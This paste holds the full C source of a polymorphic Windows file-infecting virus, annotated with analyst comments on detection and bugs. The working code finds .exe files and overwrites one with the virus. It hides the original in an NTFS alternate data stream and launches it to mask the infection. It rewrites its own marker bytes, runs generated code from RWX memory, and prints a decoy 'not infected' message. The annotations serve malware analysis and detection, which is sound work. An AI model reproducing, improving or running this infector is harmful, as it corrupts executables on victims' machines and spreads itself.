FlyFar

SpaceJunk - Polymorphic Virus

Feb 19th, 2023
/*
 * Analyst notes: this listing is a self-replicating 32-bit x86 file infector
 * for Windows.  Control flow is main -> get_exes (collect names containing
 * ".exe" in the current directory) -> readcode/find_junkpattn (skip files that
 * already carry the marker) -> infect (overwrite the target via cmd.exe and
 * stash the original in an NTFS alternate data stream) -> replace_junk
 * (rewrite marker bytes inside vir.exe on disk).  Observables useful for
 * detection are noted on each function below.
 */
#include <dirent.h>
#include <stdio.h>
#include <windows.h>
#include <string.h>
#include <time.h>

typedef unsigned char byte;
typedef void (*pfunc)(void);   /* shape of the generated code: no args, no return, ends in ret */

/* union for dynamic code generation and execution */
/* Type-puns a writable byte pointer into a callable function pointer (used by dynamic_code_gene). */
union funcptr {
  pfunc x;
  byte* y;
};

/* Opcode bases of the single-byte x86 "push r32" (0x50+reg) and "pop r32" (0x58+reg)
 * encodings.  The marker logic below relies on POP == PUSH + 8. */
#define PUSH 0x50
#define POP  0x58
#define NOP 0X90
/* Infection marker compiled into the binary: four pushes followed by four pops,
 * eight one-byte instructions.  find_junkpattn and replace_junk scan files for this
 * byte pattern, so it doubles as a signature a scanner can look for. */
#define JUNK asm("PUSH %esi\n\t""PUSH %ecx\n\t""PUSH %edx\n\t""PUSH %ebx\n\t""POP %esi\n\t""POP %ecx\n\t""POP %edx\n\t""POP %ebx\n\t");
#define JUNKLEN 8   /* byte length of the JUNK sequence */

#define MAX 10      /* capacity of exes[] */

char *st = ".exe";          /* substring matched against directory entry names in get_exes */
char *exes[MAX];            /* names collected by get_exes; main clears all slots to NULL first */
unsigned char *code;        /* contents of the most recently read file (readcode / replace_junk) */
int codelen;                /* byte length of code */
  28.  
/* function for Dynamic Code Generation and Execution */

/*
 * Builds a tiny random function in freshly allocated RWX memory and calls it.
 * The body is 0..6 (rand()%7) push/pop pairs on eax, ecx or edx
 * (reg = rand()%3, opcode 0x50+reg then 0x58+reg) followed by 0xC3 (ret),
 * so the generated code balances the stack and has no effect beyond the
 * allocation and the call itself.
 * Detection notes: VirtualAllocEx with PAGE_EXECUTE_READWRITE on the calling
 * process followed by a call into that region is the classic
 * "execute from a fresh RWX allocation" behaviour that EDR heuristics key on.
 * The 64 KiB region is never released, so every call leaves an executable
 * allocation behind (main calls this twice).
 * Returns nothing; silently returns if the allocation fails.
 */
void dynamic_code_gene() {
  int cnt;
  unsigned char c,reg;
  /* Allocating Virtual Memory which has read write and execute permissions*/
  byte* buf = (byte*)VirtualAllocEx( GetCurrentProcess(), 0, 1<<16, MEM_COMMIT, PAGE_EXECUTE_READWRITE );
  srand(time(NULL));
  if( buf==0 )
    return;
  byte* p = buf;
  cnt = rand()%7;
  while(cnt)
  {
   reg = rand()%3;   /* 0..2 -> eax, ecx, edx */
   c = PUSH + reg;
  *p++ = c;          /* push reg */
  *p++ = c+8;        /* matching pop reg */
   cnt--;
  }
  *p++ = 0xC3; // ret
  union funcptr func;
  func.y = buf;

  func.x();   // Calling the dynamic generated Code
}
  55.  
/* this function reads Code from a given file name */

/*
 * Loads the whole of `filename` into the global `code` and sets `codelen`
 * to the file size (ftell at end of stream).  The previous `code` buffer
 * is not freed and the stream is never closed, so repeated calls from
 * main's loop accumulate memory and open handles for the life of the
 * process.  The fopen result is used without a NULL check.
 */
void readcode(const char *filename) {
  FILE *fp = fopen(filename, "rb");    
  fseek(fp, 0L, SEEK_END);            
  codelen = ftell(fp);
  code = malloc(codelen);              
  fseek(fp, 0L, SEEK_SET);
  fread(code, codelen, 1, fp);        
}
  66.  
/*
 * Sum of the four bytes code[i..i+3].  Used by the marker scan: in the JUNK
 * sequence every pop opcode is its push opcode + 8, so the second half of a
 * genuine marker sums to exactly 32 more than the first half.
 * The caller is responsible for keeping i+3 within codelen.
 */
unsigned int sum4(int i)
{
 unsigned int sum;
 sum = code[i]+code[i+1]+code[i+2]+code[i+3];
 return sum;
}
/* function to modify the JUNK Code */
/*
 * Polymorphic step: opens the hard-coded "vir.exe" (the virus body itself)
 * read/write, loads it into the global `code`, scans for the JUNK marker and
 * patches each match on disk with randomly chosen push/pop register pairs.
 * reg == 4 (esp) is skipped so the stack pointer is never pushed or popped.
 * Detection notes: the literal file name "vir.exe" and an in-process
 * read-modify-write of an executable image are observables.  Because every
 * iteration of the inner loop seeks back to `sk` and `sk+4` rather than
 * `sk+j`, only byte 0 and byte 4 of the marker are actually rewritten; the
 * other six marker bytes stay identical from generation to generation, so
 * the pattern varies far less than intended.  The in-memory `code` copy is
 * not updated, the stream is never fclose'd (buffered writes presumably
 * land at process exit), and `cnt` is only reported by the commented-out
 * printf.
 */
void replace_junk(void) {
  FILE *fp = fopen("vir.exe", "rb+");    
  fseek(fp, 0L, SEEK_END);            
  codelen = ftell(fp);
  code = malloc(codelen);              
  fseek(fp, 0L, SEEK_SET);
  fread(code, codelen, 1, fp);
  long int i,j;
  int sk;
  srand(time(NULL));                                
  int c,cnt=0;
  JUNK;
  for (i = 0; i < codelen; i++) {
    unsigned start = code[i];
    unsigned end = code[i+JUNKLEN-1];   /* reads past codelen for the last seven positions */
    /* finds the pattern and replaces those instruction with some other random codes */
    if(start >= PUSH && start <= PUSH+8)
    {
      if(end >= POP && end <= POP+8)
    {
      if(sum4(i) == (sum4(i+4)-32))
      {
            cnt++;
        sk = i;   /* file offset of the matched marker */
        for(j=0;j<4;j++)
            {
              int reg = rand()%8;
          if(reg == 4)
        continue;   /* never emit push/pop esp */
              fseek(fp, sk, SEEK_SET);
              c = PUSH + reg;
          fputc(c, fp);          /* push reg at marker byte 0 */
          fseek(fp, sk+4, SEEK_SET);
              c = c + 8;
          fputc(c, fp);          /* pop reg at marker byte 4 */
        }
      }
    }
     }
  }
  JUNK;
  //printf("The total count is %d",cnt);
}
  117.  
/* finds Junk Pattern to avoid reinfecting the infected file */
/*
 * Counts occurrences of the JUNK marker in the global `code` buffer filled
 * by readcode.  A match is: a byte in the push range at i, a byte in the pop
 * range at i+7, and sum4(i+4) == sum4(i)+32.  main treats a non-zero count
 * as "already infected" and skips the file, which is exactly the property a
 * scanner can reuse to identify infected binaries.
 * The scan reads code[i+7] for i up to codelen-1, i.e. past the end of the
 * buffer for the last seven positions.
 */
int find_junkpattn(void)
{
  int i,cnt=0;                      
  JUNK;
  for (i = 0; i < codelen; i++) {
    unsigned start = code[i];
    unsigned end = code[i+JUNKLEN-1];
    if(start >= PUSH && start <= PUSH+8)
    {
      if(end >= POP && end <= POP+8)
    {
      if(sum4(i) == (sum4(i+4)-32))
      {
        cnt++;
      }
    }
    }
  }
  return cnt;
}
  139.  
/* get .exe files in the folder */
/*
 * Enumerates directory `str` (main passes ".") and records every entry whose
 * name contains the substring ".exe" (strstr, so e.g. "foo.exe.bak" also
 * matches) into the global exes[] in readdir order, each as a malloc'd copy.
 * Always returns 0; results are passed back through exes[].  The running
 * index is not compared against MAX.
 */
int get_exes(char *str)
{
  int noofexes,i = 0;
  DIR           *d;
  struct dirent *dir;
  d = opendir(str);
  JUNK;
  if (d)
  {
    while ((dir = readdir(d)) != NULL)
    {
      if((strstr(dir->d_name,st)) != NULL)
      {
       //printf("%s\n", dir->d_name);
       exes[i] =  malloc(strlen(dir->d_name) + 1);
       strcpy(exes[i++],dir->d_name);
      }
    }
    closedir(d);
  }
  JUNK;
  return 0;
}
/*
 * Overwrites target exes[i] with the virus body and hides the original.
 * All work is delegated to cmd.exe through system():
 *   1. copy <target> tmp.exe            -- stage the original
 *   2. copy vir.exe <target>            -- replace the target with the virus
 *                                         (assumes vir.exe is in the cwd)
 *   3. type tmp.exe > <target>:org.exe  -- keep the original in an NTFS
 *                                         alternate data stream of the target
 *   4. rm tmp.exe                       -- not a cmd.exe builtin; presumably
 *                                         relies on a Unix-like rm on PATH
 * Detection notes: cmd.exe children spawned from the host process, the
 * tmp.exe artifact, the literal "vir.exe", and creation of a ":org.exe"
 * alternate data stream are all observables; `dir /R` or any ADS-aware
 * tooling exposes the stream.  The command buffer is 50 bytes, so target
 * names longer than roughly a dozen characters are silently truncated by
 * snprintf (cx is never checked).  The final printf is a decoy message.
 */
void infect(int i)
{
 char *buffer;
 int cx,c;
 c = 50;
 buffer = malloc(c);
 cx = snprintf ( buffer,c,"cmd.exe /C \"copy %s tmp.exe > nul 2>&1\"", exes[i]);
 system(buffer);
 cx = snprintf ( buffer,c,"cmd.exe /C \"copy vir.exe %s > nul 2>&1\"", exes[i]);
 system(buffer);
 cx = snprintf (buffer,c,"cmd.exe /C \"type tmp.exe > %s:org.exe\"",exes[i]);
 system(buffer);
 system("rm tmp.exe");
 printf("\nHey Don't worry,You are not infected\n\n");
}
  179.  
/* Junk fun to insert Code randomly */

/*
 * Executes `i` randomly chosen two-instruction filler sequences; `i` is an
 * implicit-int (K&R style) parameter.  Because srand(time(NULL)) is
 * re-seeded on every iteration, all iterations within the same second pick
 * the same case.  Cases 0, 2 and 4 are true no-ops; cases 1 and 3 (INC/DEC)
 * leave the register unchanged but modify the flags, and none of the asm
 * statements declare clobbers.  Appears intended as runtime filler only:
 * the instruction bytes themselves are fixed at compile time.
 */
void jun_fn(i)
{
 while(i--)
 {
  srand(time(NULL));
  switch(rand()%5)
  {
   case 0:asm("PUSH %eax\n\t""POP %eax\n\t");
     break;
   case 1:asm("INC %eax\n\t""DEC %eax\n\t");
     break;
   case 2:asm("PUSH %esi\n\t""POP %esi\n\t");
         break;
   case 3:asm("INC %ebx\n\t""DEC %ebx\n\t");
     break;
   case 4:asm("NOP\n\t""NOP\n\t");
         break;
  }
 }
}  
  202.  
  203.  
/*
 * Entry point.  Sequence:
 *   - seed rand, run filler (jun_fn) and a throw-away generated function
 *     (dynamic_code_gene); neither affects the infection logic;
 *   - clear exes[] and fill it from the current directory (get_exes("."))
 *     with names that contain ".exe";
 *   - for each candidate, load it (readcode) and skip it if it already
 *     carries the JUNK marker (find_junkpattn);
 *   - infect the first unmarked file; then, unless argv[0] is exactly
 *     "./vir", mutate vir.exe on disk (replace_junk) and launch
 *     "<argv[0]>.exe:org.exe" with "start /B" -- the original program kept
 *     in the alternate data stream -- so the host still appears to behave
 *     normally (assumes argv[0] is given without its .exe suffix);
 *   - break after that one infection.
 * Detection notes: one newly overwritten executable per run plus a
 * "start /B" child whose image path contains ":org.exe" is the behavioural
 * fingerprint.  The 50-byte `buffer` is never freed; argc is unused.
 */
int main(int argc,char *argv[])
{
  srand(time(NULL));
  int i=0;
  jun_fn(rand()%7);
  char *buffer;
  JUNK;
  buffer = malloc(50);
  JUNK;
  dynamic_code_gene();
  JUNK;
  for(i=0;i<MAX;i++)
     exes[i] = NULL;
  jun_fn(rand()%7);
  get_exes(".");
  i = 0;
  jun_fn(rand()%7);
  dynamic_code_gene();
  while(exes[i])
  {
   readcode(exes[i]);
   if(!(find_junkpattn()))   /* no marker -> not yet infected */
   {
    infect(i);
    if((strcmp(argv[0],"./vir")))   /* true whenever argv[0] differs from "./vir" */
    {
        replace_junk();
        snprintf (buffer,50,"cmd.exe /C start /B %s.exe:org.exe",argv[0]);
        system(buffer);
    }
        break;   /* one infection per execution */
   }
   i++;
  }
   JUNK;
   
   return(0);
}